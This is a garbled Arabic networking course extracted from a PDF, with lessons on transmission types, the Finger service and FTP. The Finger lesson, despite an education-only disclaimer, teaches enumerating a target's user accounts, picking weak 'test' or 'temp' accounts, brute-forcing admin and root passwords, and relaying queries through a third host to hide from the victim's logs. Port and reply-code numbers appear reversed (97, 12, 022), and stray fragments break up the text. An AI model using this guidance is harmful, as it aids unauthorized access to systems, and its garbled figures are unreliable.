-2‬طريقة النقل ذات المدى الواسع‬ ‫‪ Baseband‬‬ ‫‪B‬‬ ‫‪ -1‬طريقة النقل ذات المدى القاعدي‬ ‫عبر‪ ‬‬ ‫وتنتقل البیانات فیه على ھ یئة نبضات ضوئیة ‪ /‬كھريبة وكلما كانت تنتقل ر‬ ‫الشارة‪ ‬‬ ‫ة‬ ‫كابل طويل كلما ضعفت‬ ‫نفسھ ا و في حالو الضطرار الى استخدام كابل طويل يجب وضع ادوات للتقوية‬ ‫ة‬ ‫ل‪ ‬‬ ‫‪ Repeaters‬و التي تعید ارسال‬ ‫الشارة الضعیفة بعد استقبالھا ‪ ..‬‬ ‫‪ Broadband‬‬ ‫‪B‬‬ ‫‪ -2‬طريقة النقل ذات المدى الواسع‬ ‫‪ 71‬‬ ‫القاعدي‪ ‬‬ ‫ي‬ ‫وتنتقل البیانات على موجات ضوئیة وكما ان نظام النقل ذو المدى‬ ‫م‪ ‬‬ ‫يستخدم ‪ Repeaters‬نجد ان نظام‬ ‫‪ . amplifiers‬‬ ‫‪.‬‬ ‫النقل ذو المدى الواسع يستخدم المكبرات‬ ‫‪ -:‬‬ ‫تلخیص الدرس الول ‪-‬‬ ‫· تستخدم الشبكات في تسھیل تبدال البیانات و مشاركة‬ ‫ة‬ ‫الملفات ‪ ..‬‬ ‫‪ . ( LAN ­ WAN ­ MAN‬‬ ‫‪.‬‬ ‫· يوجد ثلث انواع من الشبكات (‬ ‫· توجد فائدتان رئیسیتان للشبكات ‪ :‬مشاركة البیانات وو‪ ‬‬ ‫‪ . Hardware‬‬ ‫‪.‬‬ ‫المعلومات و مشاركة الجھزة‬ ‫· يوجد ‪ 5‬اشكال لطبولوجیا الشبكات ‪ .‬‬ ‫ف‪ ‬‬ ‫· يوجد ‪ 3‬انواع للكابلت ( المحورية ‪ -‬المزدوجة ‪ -‬اللیاف‬ ‫الضوئیة ) ‪ ..‬‬ ‫‪ , Baseband‬‬ ‫‪,‬‬ ‫· يوجد طريقتین لنقل الشارات اللكترونیة (‬ ‫‪ ( Broadband‬‬ ‫‪ 81‬‬ ‫‪ Finger‬‬ ‫‪F‬‬ ‫خدمة‬ ‫‪ LAMeR‬‬ ‫‪L‬‬ ‫للكاتب‪:‬‬ ‫وبركاته‪ ‬‬ ‫ه‬ ‫السلم علیكم ورحمة االله‬ ‫تقبلوا مني ھ ذا الدرس عن بروتوكول خدمة ‪ Finger‬التي تعمل على بورت ‪9‬‬ ‫‪97‬‬ ‫الدرس‪ ‬‬ ‫س‬ ‫بسم االله نبدأ‬ ‫الدرس‪ ‬‬ ‫س‬ ‫فھرس محتويات‬ ‫<================>‪ ‬‬ ‫تبرئة‪ ‬‬ ‫‪ 1.1‬ة‬ ‫‪ Finger‬‬ ‫‪F‬‬ ‫‪2.1‬مقدمة عن‬ ‫ن‬ ‫‪ Finger‬‬ ‫‪F‬‬ ‫م‬ ‫استخدام‬ ‫‪3.1‬‬ ‫‪ Finger‬‬ ‫‪F‬‬ ‫‪4.1‬بعض الخدع عند استخدام خدمة‬ ‫ة‬


‫‪5.1‬الستعلم عن طريق موقع بأستخدام ‪ Finger‬‬ ‫‪6.1‬الستنتاج من ھذا الدرس‪ ‬‬ ‫‪7.1‬الختام‪ ‬‬ ‫‪1.1‬تبرئة‪ :‬‬ ‫<=========>‪ ‬‬ ‫ھذا الدرس فقط للتعلیم ولیس للقیام بأعمال غیر شرعیة‪ ‬‬ ‫فالكاتب ل يتحمل اي مسؤولیة للستخدام السيء لھذا الدرس‪ .‬‬ ‫‪2.1‬مقدمة عن ‪ Finger‬‬ ‫<===================>‪ ‬‬ ‫إ ّ ‪ Finger‬ديمون خدمة تعمل عن طريق البورت ‪ 97‬عادة وكانت ن‪ ‬‬ ‫مستخدمة أصل كنوع ‪ businesscard‬رقمي للناس‪ .‬‬ ‫المستخدم البعید ( ‪(remote user‬يمكن أن يرسل طلب إلى ‪ Finger‬ديمون‪ ‬‬ ‫يجري على نظام معین‪ ‬‬ ‫بورت ‪ Finger‬نوعیة(‪ )97‬وسیحصل على إجابة‪ .‬‬ ‫‪ 91‬‬ ‫ھ ذه الجابة ستخبرك من ھم المستخدمین على ھذا النظام و أيضا‪ ‬‬ ‫بعض المعلومات عن ھ ؤلء المستخدمین المتصلین بالنظام‪ .‬‬ ‫إضافة إلى ھ ذه المعلومات ‪,‬في أغلب الحیان الجابة تخبرك أيضا من الذي‪ ‬‬ ‫يدير النظام (‪(admin‬وكیف قام بالتصال‪ .‬‬ ‫قديما استخدم الناس التصال على جمیع انواع النظمة في العالم وطلب‪ ‬‬ ‫الستعلم عن ھ ذه النظمة و الـ ‪ Finger‬كان يعطیھم معلومات عن‪ ‬‬ ‫من ھم الموجودون في النظام وھل لھم حسابات في ھذا النظام‪.‬وكان ‪Finger‬‬ ‫يستخدم قديما في‪ ‬‬ ‫الجامعات و الشركات الكبیرة أيضا‪ .‬‬ ‫في الماضي ‪ ،‬الـ ‪ Finger‬إستعمل عامة عن طريق الطلب في الجامعات‪ ‬‬ ‫اذا ارادوا معلومات تخص طلب اخرين في نفس الجامعه‪ ‬‬ ‫وكثیرا ما تكون الجابة (اجابة ( ‪ Finger Deamon‬بجملة " ! ‪ " Finger me‬اي‪ ‬‬ ‫"أعلمني" !‪ ‬‬ ‫أما الن ومع وجود شبكة النترنت العالمیة اصبح ‪ Finger‬‬ ‫أقل شھ رة ‪ ،‬لنه توجد الن‪ ‬‬ ‫مواقع الويب للعمل كبطاقة عمل (‪(bisinesscard‬رقمیة خاصة بمستخدمین‪ ‬‬ ‫النترنت وبسبب ملحظة الناس‪ ‬‬ ‫التھ ديد الواسع للمن اللكتروني ق ّ استخدام خدمة ‪ Finger Deamon‬‬ ‫ل‪ ‬‬ ‫على أية حال‪ ،‬‬ ‫لیس كل النظمة منعت ھ ذه الخدمة وستجد بعض المواقع ) النظمة) تقدم‪ ‬‬ ‫ھذه الخدمة ‪ .‬‬ ‫وھذه اليام يقوم الھ كرز بمحاولت اختراق النظمة بأستخدام برامج‪ ‬‬ ‫‪portscans‬للبحث عن البورتات المفتوحة‪ . . .‬بدون أ ّ أساس علمي‪ .‬‬ ‫ي‪ ‬‬ ‫لذلك إ ّ ‪ Finger‬ديمون‪ ،‬مثال عظیم لخدمة‪ ‬‬ ‫ن‪ ‬‬ ‫يمكن استخدامھ ا قانونیا لتزودك بكمیة ضخمة من المعلومات الح ّاسة‪ ‬‬ ‫س‪ ‬‬ ‫حول ھدف‪ .‬‬ ‫لھ ذا سوف أحاول ان اشرح في ھذا الدرس بلغة مفھومة‪ ‬‬ ‫ما ھو ‪ Finger‬ديمون وماذا يفعل وكیف يمكن استخدامه في مصلحتك‪ ‬‬ ‫الخلصة المقدمة‪ :‬ان خدمة ‪ Finger‬كانت قديما ولزالت تستخدم لجلب‪ ‬‬ ‫المعلومات عن‪ ‬‬ ‫‪ 02‬‬


‫المستخدمین الموجودين في النظام و ھل لديھم حسابات في ھذا النظام ام‪ ‬‬ ‫ل‪ .‬‬ ‫ملحظة ‪ :‬النظام ( ‪( server‬ھو جھ از كمبیوتر تخزن فیه معلومات ھائلة‪ ‬‬ ‫ويستخدم في استضافة المواقع‪ ‬‬ ‫‪3.1‬استخدام ‪ Finger‬‬ ‫<=================>‪ ‬‬ ‫عند استخدام اي من برامج السكان المعروفة مثل ( ‪ (superscan‬للبحث‪ ‬‬ ‫في موقع معین (مثل ( ‪ http://www.foobar.com‬ووجدت به منفذ ‪ (Port‬بورت)‬ ‫‪ 97‬مفتوحا‪ ‬‬ ‫ھذا يعني ان ‪ http://www.foobar.com‬‬ ‫له ‪ Finger‬ديمون يعمل‪ .‬‬ ‫الن كیف نقوم بـ (‪(request‬طلب استعلم؟‪ ‬‬ ‫عن طريق وندوز‪ ‬‬ ‫في أغلب الحیان وندوز ل يوجدبه زبون (‪ (client‬خاص للـ ‪ Finger‬مركب )‪ ‬‬ ‫‪ ) installed‬‬ ‫لذلك سوف نستخدم ‪ Telnet‬كخادم لـ ‪ Finger‬‬ ‫‪-‬توضیح‪ --‬‬‫‪ Telnet(client) ­­­­­­­­request­­­­­­­> Finger Deamon(in Server) o‬‬ ‫عن طريق كتابة السطر التي في موجة الدوس‪ (MS DOS ( :‬‬ ‫‪ 97 telnet www.foobar.com‬‬ ‫بعد ذلك سیظھر لك برنامج ‪ telnet‬و منه تطبع الوامر ‪ .‬‬ ‫اما من يونیكس‪ ‬‬ ‫لسنا بحاجة إلى أن نستعمل تیلنت لنه يوجد بنظام لینوكس‪ ‬‬ ‫زبون(‪(client‬خاص بخدمة ‪ Finger Deamon‬‬ ‫مر ّب على النظام بشكل دائم تقريبا‪.‬ك‪ ‬‬ ‫‪ 12‬‬ ‫|==========================================‬ ‫===========|‪ ‬‬ ‫|ملحظة ‪ :::‬سیكون الشرح التالي حتى نھاية الدرس لمستخدمي لینوكس‪ ‬‬ ‫أما أذا قررت الستمرار بأستخدام|‪ ‬‬ ‫|وندوز ستكون كتابة الوامر في موجه الدوس ثم في التلنت وستكون كتابة‪ ‬‬ ‫الوامر نفسھا الوامر التي|‪ ‬‬ ‫|تنكتب بأستخدام نظام لینوكس ولكن بدل "@" نضع" مسافة ثم "‪ www‬في‪ ‬‬ ‫الوندوز مراعیا اسم الموقع|‪ ‬‬ ‫|مثل يكون كتابة الوامر في لینوكس ھكذا| ‪ :‬‬ ‫‪ | |finger@anyname.com‬‬ ‫|ولكن في وندوز سیكون ھكذا| ‪ :‬‬ ‫‪ | |finger www.anyname.com‬‬ ‫|لحظ المسافة بین ‪ finger‬و| ‪ www‬‬ ‫|==========================================‬ ‫===========================================‬ ‫=======|‪ ‬‬ ‫اطبع في محث الوامر في يونكس على افتراض انك تستخدم‪ unix shell ) L‬‬ ‫‪ finger@foobar.com‬‬ ‫لحظ ان الھ دف (الموقع المرادمنه معرفة من ھم مستخدمینه ) ھنا ھو‪ ‬‬ ‫‪www.foobar.com‬كمثال‪ ‬‬ ‫فستظھرالنتائج‪ :‬‬ ‫‪ :Login: Name: Tty: Idle: When: Where‬‬ ‫‪ root foobar sys console 17d Tue 10:13 node0ls3.foobar.com‬‬ ‫‪ >.......< >.......< >.......< Amos Amanda‬‬


‫‪ Anderson Kenneth‬‬ ‫‪ Bright Adrian‬‬ ‫‪ Doe John‬‬ ‫‪ >.......< >.......< >.......< Johnson Peter‬‬ ‫‪ Mitnick Kevin‬‬ ‫‪ 22‬‬ ‫‪ Munson Greg‬‬ ‫‪ Orwell Dennis‬‬ ‫النتائج؟‪ ‬‬ ‫؟‬ ‫الن ماذا تعني ھذه‬ ‫‪ (Name‬‬ ‫(‬ ‫في العمود الول( ‪ ( login‬نرى أسماء المستعملین وفي الثاني (‬ ‫الحقیقیة"‪ ،‬‬ ‫‪،‬‬ ‫"السماء‬ ‫حقیقة‪ .‬‬ ‫‪.‬‬ ‫التي بالطبع لیست حقیقیة‪ ،‬لكن في معظم الوقت‬ ‫‪ the terminal type‬‬ ‫‪t‬‬ ‫يرينا العمود الثالث(‪ (Tty‬النوع الطرفي‬ ‫‪ the idle time‬‬ ‫‪t‬‬ ‫والرابع (‪ (Idle‬فترة التوقف‪.‬‬ ‫والسادس‪ ‬‬ ‫س‬ ‫وبعد ذلك في العمودين الخامس‬ ‫بالنظام‪ .‬‬ ‫‪.‬‬ ‫الوقت والمكان الذي استخدم فیه الحساب للتصال‬ ‫أحیانا توجد أعمدة بعنواوين اليمیلت وأرقام ھ واتف‪ ..‬الخ الخاصة بمستخدمین‬ ‫ن‬ ‫النظام‪ ‬‬ ‫م‬ ‫ھذا‬ ‫بیتر‪ ‬‬ ‫إذا كنت تريد المزيد من المعلومات عن مستخدم مّعن ‪ (Johnson Peter‬ر‬ ‫ی‪ ‬‬ ‫ی‬ ‫جونسن‪ ‬‬ ‫ن‬ ‫التالي‪ :‬‬ ‫‪:‬‬ ‫على سبیل المثال) أدخل المر‬ ‫‪ finger johnson@foobar.com‬‬ ‫‪ Finger‬‬ ‫‪F‬‬ ‫‪4.1‬بعض الخدع عند استخدام خدمة‬ ‫ة‬ ‫<====================================‪ > ‬‬ ‫مى الن شاھدت ما الضعف الرئیسي لخدمة‪ Finger.‬‬ ‫ن‬ ‫ن‪ ‬أت ّ‬ ‫‪Finger deamon‬يريك ماھي الحسابات الموجوده على النظام‪ ..‬‬ ‫ة‪ ‬‬ ‫ھذا يعني أنك تكسب (عن طريق قانوني ) ‪ % 05‬من المجموعة السحرية‬ ‫ي‪ ‬‬ ‫وھي‬ ‫الدخول‪ ‬‬ ‫ل‬ ‫كلمات السر‪/‬مجموعة أسماء المستخدمین التي ستمنحك‬ ‫(‪(Access‬إلى نظام ‪ .‬‬ ‫‪ 32‬‬ ‫برنامج‪ ‬‬ ‫ج‬ ‫إذا عرفت أسماء المستخدمین‪ ،‬ستكون الخطوة القادمة متوقفه على‬ ‫أو‪ ‬‬ ‫‪ bruteforce‬و‬ ‫‪ worldist password cracker‬‬ ‫‪w‬‬ ‫بمعنى آخر برامج تخمین الباسوورد‬ ‫المثال‪ ‬‬ ‫ل‬ ‫ھناك سكربتات خا ّة كتبت للتیلنت على سبیل‬ ‫ص‪ ‬‬ ‫ص‬ ‫ن‪ ‬‬ ‫اذھب لموقع ‪ http://www.thehackerschoice.com /‬أو ابحث عن‬ ‫‪ VLAD's pwscan.pl‬‬ ‫او‪ ‬‬ ‫لذلك يجب علیك ان تكون قائمة بكلمات السر في ملف نصي (‪ (word‬و‬ ‫المفكره‪ ‬‬ ‫ه‬ ‫تعمل‪ ‬‬ ‫ل‬ ‫وحاول ان تكون كلمات السرقريبة من أسماء المستخدمین وإذا لم‬ ‫القائمة‪ ‬‬ ‫ة‬ ‫استخدم برنامج‪ bruteforce -‬أنصحك بھ ذا الوقت ان تحظر لك كأس شاھي‪ ‬‬ ‫استراحة‪ ‬‬ ‫ة‬ ‫وتأخذ لك‬ ‫عمله‪ -‬‬ ‫‬‫وتجعل البرنامج يعمل‬ ‫من‪ ‬‬ ‫بالطبع نجد بعض الحسابات للمستخدمین للنظام اكثر اھمیة من غیرھا ن‬ ‫الحسابات‪ .‬‬ ‫‪.‬‬ ‫ف‪ ‬‬ ‫وخاصة حساب الدارة (‪ (Admin‬أو الجذر (‪(root‬بسبب انه عندما تعرف‬ ‫م‪ ‬‬ ‫الباسوورد الخاص بھم‬


‫وقتھ ا تستطیع التحكم بالموقع ‪ .‬وبالطبع بعض الحسابات سھ لة تخمین كلمة‪ ‬‬ ‫السر‪ .‬‬ ‫ھناك بعض الخدع لمعرفة ھذا النوع من الحسابات‪ .‬على سبیل المثال‪ ‬‬ ‫إطبع المر‪ :‬‬ ‫‪ finger secret@foobar.com‬‬ ‫عندما ترسل ھذا المر الي ‪ Finger Deamon‬سیعطیك جمیع الحسابات‪ ‬‬ ‫التي تحتوي على كلمة "‪ "secret‬أ ّا في اسم المستعمل أو السم الحقیقي‪.‬‬ ‫م‪ ‬‬ ‫اذا‪ ،‬ماھو الشي المھم في ھ ذا؟ حسنا أنت يمكنك أن تستعمل "‪ "test‬أو‪ ‬‬ ‫"‪"temp‬أو "‪ "0000‬‬ ‫بدل من "‪ "secret‬وكما تعرف من المحتمل ان يكون ھذاالنوع من الحسابات‪ ‬‬ ‫سھ ل معرفة باسوورداته في أغلب الحیان‪ .‬‬ ‫‪ finger .@foobar.com‬‬ ‫‪ 42‬‬ ‫‪ finger 0@foobar.com‬‬ ‫جرب ھذه الوامر وشاھد ما يحدث!‪ ‬‬ ‫حاول التعرف على ‪ ، Finger Deamon‬أقرأ ‪RFC‬وأوجد خدعك بنفسك!‪ ‬‬ ‫‪5.1‬الستعلم عن طريق موقع بأستخدام ‪ Finger‬‬ ‫<======================================‪ > ‬‬ ‫إذا أردت ان استخدم خدمة) ‪ Finger‬معنى ‪ Finger‬كفعل "ألمس" ولكنھا تأتي‪ ‬‬ ‫ھنا بمعنى" استعلم("‪ ‬‬ ‫والستعلم عن موقع معین مثل ھذا"‪ "www.victim.com‬‬ ‫وأيضا تعرف أن موقع آخر " ‪ "www.host.com‬يقدم خدمة ‪ Finger‬تعمل‪ ،‬‬ ‫عندھ ا يمكنني ان أقدم طلبا مثل ھ ذا‪(:‬اكتب في محث الوامر مثل ھذا(‪ ‬‬ ‫‪ finger@host.com@victim.com‬‬ ‫‪Host.com‬يستعلم ( ‪ (Finger‬الن ‪ victim.com‬ويريك النتائج ‪ .‬‬ ‫أحدالفوائد من ھذه الطريقة انك ستكون مجھول لدى‪ victim.com‬‬ ‫فعندما تقوم‪ www.victim.com‬‬ ‫بطلب سجل (الدخول (‪log‬ستشاھد ‪ www.host.com‬في سجلتھم‪ ،‬بدل منك‬ ‫‪ .‬‬ ‫فائدة اخرى وھ ي أنك يمكن ان تترك) ‪ Host‬موقع) يقوم ( عن طريق خدمة‪ ‬‬ ‫( ‪Finger‬بالستعلم عن حاسوبا‪ ‬‬ ‫آخرا على نفس الشبكة ‪ ،‬بینما اذا طلبت انت ھ ذا الستعلم بأستخدام خدمة‬ ‫‪Finger‬من جھازك‪ ‬‬ ‫لن تكون مسموحة لك لنك سأكون غیر موثوق به لدى المستعلم عنه‪ ‬‬ ‫بعكس اذا كان الطلب للستعلم باستخدام ‪ Finger‬عن طريق موقع‪ .‬‬ ‫يعني الخلصة ‪ :‬ان الموقع الذي تريد الستعلم عنه يعتبر حاسوبك الشخصي‬ ‫غیر موثوق به بعكس‪ ‬‬ ‫اذا كان الستعلم عن طريق موقع اخر يشابھه فسوف يسمح له ‪ !.‬‬ ‫‪ 52‬‬ ‫‪6.1‬الستنتاج من ھذا الدرس‪ ‬‬ ‫<=======================>‪ ‬‬ ‫‪ Finger Deamon‬يمكن أن يكون مصدر معلومات ضخم لي واحد يحاول‪ ‬‬ ‫كسب الدخول ( ‪( access‬إلى نظام‪ .‬‬ ‫‪ Finger deamon‬قانونیا يز ّدك بنصف كلمات السر واسماء المستخدمین‪ ‬‬ ‫و‪ ‬‬ ‫التي تحتاجھا لكسب الدخول‪ access.‬‬ ‫ھ ناك بضعة خدع لطیفة تمكنك من معرفة حسابات خاصة تبحث عنھا‪ ‬‬ ‫من معرفتك لھ ذه الحسابات تستطیع كسر الباسووردات ‪ ،‬بإستعمال تقنیة‬ ‫‪wordlist‬أو‪ bruteforce.‬‬


‫ل ‪ Finger deamon‬‬ ‫ك‪ ‬تذ ّر فوائد "الستعلم عن طريق موقع"أيضا بأستعمال‬ ‫ك‬ ‫الختام‪ ‬‬ ‫م‬ ‫‪7.1‬‬ ‫<=========>‪ ‬‬ ‫الدرس‪ ‬‬ ‫س‬ ‫اتمنى الستفادة لمن قرأ ھذا‬ ‫الشرح‪ ‬‬ ‫ح‬ ‫وانشاالله ما أكون طولت علیكم في‬ ‫مسلم‪ ‬‬ ‫م‬ ‫وترا حقوق النشر لكل‬ ‫‪ 62‬‬ ‫‪ FTP‬‬ ‫‪F‬‬ ‫ماھو‬ ‫‪ KING_ABDO‬‬ ‫‪K‬‬ ‫للكاتب‪:‬‬ ‫؟‪ ‬‬ ‫ما ھو بروتوكول نقل الملفات ؟‬ ‫­=­=­=­=­=­=­=­=­=­=­=­=­=­=‪ ‬‬ ‫‪ ftp= file transfer protocol‬‬ ‫بروتوكول نقل الملفات ھ و عباره عن مجموعة من من القواعد التي تملي كیفیة‬ ‫ة‬ ‫‪ tcp/ip‬‬ ‫‪t‬‬ ‫نقل الملفات على بروتوكولت‬ ‫يتكون التصال من مزود و زبون حیث يقوم الزبون بالحصول على ملف عن طريق‬ ‫ق‬ ‫‪ 12‬‬ ‫فتح اتصال مع المزود ‪ ،‬و غالبا يعمل المزود ھنا عن طريق المنفذ رقم ‪1‬‬ ‫ملحظة!‪ ‬‬ ‫!‬ ‫­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=‪ ‬‬ ‫­=‪ ‬‬ ‫ر‪ ‬‬ ‫يمكن أن يغیر مدير النظام رقم المنفذ من ‪ 12‬إلى أي منفذ آخر‬ ‫­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=­=‪ ‬‬ ‫­=‪ ‬‬ ‫عبارة‪ ‬‬ ‫ة‬ ‫و عندما يتم التصال بین المزود و الزبون يقوم المزود بإرسال‬ ‫الشكل‪ ‬‬ ‫ل‬ ‫‪:‬ترحیبیة للزبون و غالبا تكون بمثل ھذا‬ ‫‪ 022 ! SpiderMan's FTP server. Please login‬‬ ‫‪ completion code‬كما لحظت يوجد ھناك رقم في بداية العبارة و ھو ماا‪ ‬‬ ‫يسمى‪ ‬‬ ‫ى‬ ‫الكمالي‪ ‬‬ ‫ي‬ ‫الرمز‬ ‫ما‪ ‬‬ ‫و في العبارة الترحیبیة يكون الرمز الكمالي واحد من اثنین و ھ ا‬ ‫‪ 022‬‬ ‫‪0‬‬ ‫إذا قبل المزود التصال‬ ‫‪ 124‬‬ ‫إذا رفض المزود التصال ‪1‬‬ ‫طلب‪ ‬‬ ‫بعد أن يقوم المزود بإرسال العبارة الترحیبیة يقوم الزبون بإرسال ب‬ ‫‪ 72‬‬ ‫الكلمات‪ ‬‬ ‫ت‬ ‫إلى المزود ‪ ،‬و يكون ھذا الطلب عبارة عن كلمة معینه و بعض‬ ‫يكثر‪ ‬‬ ‫تحتاج إلى إضافة قیمة لھا و ھذا الجدول يحتوي على الكلمات التي ر‬ ‫استخدامھاا‪ ‬‬ ‫الوظیفة‪ ‬‬ ‫ة‬ ‫الطلب‬ ‫م‪ ‬‬ ‫‪ CWD‬تغییر المجلد الحالى في الملقم‬ ‫ة‪ ‬‬ ‫‪ PWD‬كتابة الموجود في المجلد الحالي على الشاشة‬ ‫ه‪ ‬‬ ‫‪ CDUP‬للخروج من المجلد الحالى إلى المجلد الذي يحتويه‬ ‫م‪ ‬‬ ‫‪ MKD‬لنشاء مجلد على الملقم‬ ‫م‪ ‬‬ ‫‪ RMD‬لزالة مجلد من على الملقم‬ ‫م‪ ‬‬ ‫‪ DELE‬لزالة ملف من على الملقم‬ ‫ل‪ ‬‬ ‫‪ USER‬لرسال اسم المستخدم في عملیة الدخول‬ ‫ل‪ ‬‬ ‫‪ PASS‬لرسال كلمة السر في عملیة الدخول‬ ‫ل‪ ‬‬ ‫‪ ABOR‬للتوقف عن النقل‬ ‫ل‪ ‬‬ ‫‪ QUIT‬لغلق لتصال‬ ‫م‪ ‬‬ ‫‪ STAT‬للحصول على الحالة على الملقم‬ ‫م‪ ‬‬ ‫‪ RETR‬لطلب الحصول على ملف من الملقم‬ ‫م‪ ‬‬ ‫‪ STOR‬لرسال ملف من جھاز الزبون إلى الملقم‬


‫‪ SYST‬للحصول على معلومات عن نظام التشغیل على الملقم‪ ‬‬ ‫‪ HELP‬للحصول على مساعدة عن أحد الطلبات‪ ‬‬ ‫بعد إرسال الطلب يجب على الزبون أن ينتظر حتي يتلقى الرد من المزود قبل‪ ‬‬ ‫أن يقوم بإرسال طلب آخر‪ ‬‬ ‫إل إذا قام بإرسال طلب إغلق للتصال فلن يكون علیه النتظار حتى يتلقى الرد‬ ‫من المزود بالنسبة للمر السابق‪ ‬‬ ‫بعد أن يتم التصال و يقوم المزود بإرسال العبارة الترحیبیة يجب على الزبون أن‪ ‬‬ ‫يقوم بإرسال إسم‪ ‬‬ ‫المستخدم و كلمة السر لیقوم بالدخول إلى ملقم الخدمة‪ ‬‬ ‫بعد أن يقوم الزبون بإرسال طلبة يقوم المزود بإرسال الرد علیه و ھو يتكون من‪ ‬‬ ‫رمز إكمالي متبوعا بسطر أو أكثر‪ ‬‬ ‫‪ 82‬‬ ‫و عموما فعندما يكون الرقم الثاني من الرمز الكمال ھو ‪ 0‬فیكون ھناك خطأ‬ ‫كتابي في الطلب الذي أرسله الزبون‪ ‬‬ ‫و عندما يكون الرقم الثاني ‪ 2‬فعندھا تكون إما عبارة ترحیب أو توديع ‪ .‬‬ ‫‪ 92‬‬ ‫ماھو نقل الملفات ‪ ?FTP‬‬ ‫‪ FTP‬ھي اختصار لكلمة ‪ File Transfer Protocol‬وتعني بروتوكول نقل الملفات‪،‬‬ ‫وھذه الخدمة ھي احدى تسھیلت ‪ TCP/IP‬التي تجعل من الممكن نقل‪ ‬‬ ‫الملفات بین الكمبیوترات على الشبكة ومن میزات ‪ FTP‬الرائعة أنھا تقوم‪ ‬‬ ‫بترجمة شكل الملفات النصیة بطريقة أتوماتیكیة حیث أن الكمبیوترات تحتوي‪ ‬‬ ‫نظم تشغیل مختلفة وعلیه فلديھا أشكال ‪ Formats‬مختلفة للملفات النصیة‪ ‬‬ ‫فبالتالي تحتاج لترجمة وھو ماتقوم به ‪ ,FTP‬وبخدمة نقل الملفات فاننا نحتاج‪ ‬‬ ‫ف في أمیركا الى جھازنا‪ .‬‬ ‫لبضع نقرات على الفأرة كي ننقل مل ً‬ ‫ا‪ ‬‬ ‫أقسام نقل الملفات‪ :‬‬ ‫نقل الملفات ينقسم الى قسمین‪ :‬‬ ‫•‪ ‬تنزيل الملفات ‪ :Download‬‬ ‫وھو جلب الملفات من الكمبیوتر المضیف ‪ Host‬الى الجھاز المحلي ‪ .Local‬‬ ‫•‪ ‬ارسال الملفات ‪ :Uplaod‬‬ ‫وھو ارسال الملفات من الكمبیوتر المحلي ‪ Local‬الى الكمبیوتر المضیف ‪.Host‬‬ ‫ومن الناحیة المنیة فھناك نوعان لنقل الملفات‪ :‬‬ ‫•‪ ‬نقل مؤمن ‪ :FTP Secure‬‬ ‫تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل علیه من‪ ‬‬ ‫مدير النظام المضیف‪ .‬‬ ‫•‪ ‬نقل مجھول ‪ :Anonymous FTP‬‬ ‫ب استخدام‪ ‬‬ ‫لتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطیع غال ً‬ ‫ا‪ ‬‬ ‫ض عنھما‪ .‬‬ ‫‪ guest‬أو ‪ anonymous‬عو ً‬ ‫ا‪ ‬‬ ‫تصنف مصادر البرامج على النترنت الى ثلثة أقسام‪ :‬‬ ‫‪ 03‬‬ ‫•‪ ‬ملكیة عامة ‪ :Public Domain‬‬ ‫وضعت البرامج ھنا للستخدام العام فلیس ھ ناك حقوق ملكیة لحد ول قیود‪ ‬‬ ‫على استخدامھا وتوزيعھا وتعديلھا‪ .‬‬ ‫•‪ ‬مصادر مجانیة ‪ :Freeware‬‬ ‫يحق للجمیع استخدام ھذه البرامج أو توزيعھا ولكن ھناك حقوق ملكیة ونشر‪ ‬‬ ‫ول يجوز تعديلھا أو بیعھا‪ .‬‬ ‫•‪ ‬مصادر مشتركة ‪ :Shareware‬‬ ‫يتم توزيع ھ ذه البرامج بغرض التجربة قبل الشراء وقد لتتضمن جمیع الممیزات‪ ‬‬


‫ويجب تحطیم النسخ بعد انتھاء مدتھا‪ .‬‬ ‫‪ FTP‬والفیروسات‪ :‬‬ ‫يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمین‪ ‬‬ ‫‪ :ASCII‬‬ ‫ا‪ ‬اختصاًر لـ( ‪ (American Standard Code for Information Interchange‬‬ ‫والملفات من ھذا النوع تحتوي على سبعة جزيئات ‪ bits‬تتراوح قیمتھا بین‪ ‬‬ ‫الصفر و ‪ .721‬ويستخدم ھذا المصطلح للتعبیر عن المعیار الذي يقوم بتحويل‪ ‬‬ ‫الحرف الى أرقام في الكمبیوتر‪ .‬وتستخدم الملفات النصیة ھذا النوع من‪ ‬‬ ‫الصیغ‪ .‬‬ ‫‪ :Binary‬‬ ‫وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانیة جزيئات ‪ bits‬تتراوح بین‬ ‫الصفر و ‪ 552‬وتندرج الصور والبرامج والملفات المضغوطة تحت ھذا النوع‪ .‬‬ ‫والفیروسات ل يمكن أن تنتقل عبر ملفات ‪ ASCII‬كما ليمكن أن تنتقل عبر‪ ‬‬ ‫الصور كصیغ ‪ bmp & gif & jpg‬وغیرھا من امتدادات الصور ول عبر ملفات‪ ‬‬ ‫الفیديو والصوت مثل ‪ mpg ­ mp3 ­ wav ­ avi ­ ram‬وغیرھا‪ ،‬وبمعنى آخر فانھا‬ ‫تنتقل عبر البرامج وملفات النظام والتشغیل والبرامج المضغوطة وعادة ماتكون‪ :‬‬ ‫‪ 13‬‬ ‫‪ovl ­ zip ­ mim ­ uue ­ xxe ­ b64 ­ exe ­ com ­ bat ­ dll ­ drv ­ sys ­ bin‬‬ ‫‪ ،­ bhx‬كما يمكن أن تنتقل فیروسات الماكرو عبر تطبیقات ‪ ،MS Office‬لذلك‪ ‬‬ ‫م قبل تشغیلھا‪ .‬‬ ‫احذر من ھذه الملفات وافحصھا دائ ً‬ ‫ا‪ ‬‬ ‫طريقة نقل الملفات ‪ :FTP‬‬ ‫ھناك طرق عديدة لنقل الملفات وھي‪ :‬‬ ‫•‪ ‬نقل الملفات باستخدام نظام ‪ UNIX‬‬ ‫تتطلب ھذه العملیة عادة استخدام أوامر وھاھنا بعض أوامر ‪ :UNIX‬‬ ‫‪ :ascii‬لنقل ملفات ‪ ASCII‬النصیة‪ ،‬وعند تغییر ھذا الوضع ثم الحاجة لنقل ملفات‬ ‫من ھذا النوع فیجب اعادة المر‪ .‬‬ ‫‪ :binary‬لنقل الملفات الثنائیة‪ ،‬وعند تغییر ھذا الوضع ثم الحاجة لنقل ملفات‪ ‬‬ ‫من ھذا النوع فیجب اعادة المر‪ .‬‬ ‫‪ :status‬لفحص الملف ومعرفة ھل ھو من نوع ‪ ASCII‬أو ‪ .Binary‬‬ ‫‪ :help‬لعرض قائمة بأوامر ‪ .UNIX‬‬ ‫‪ :dir‬عرض محتويات الدلیل‪ ‬‬ ‫‪ :ls‬عرض محتويات 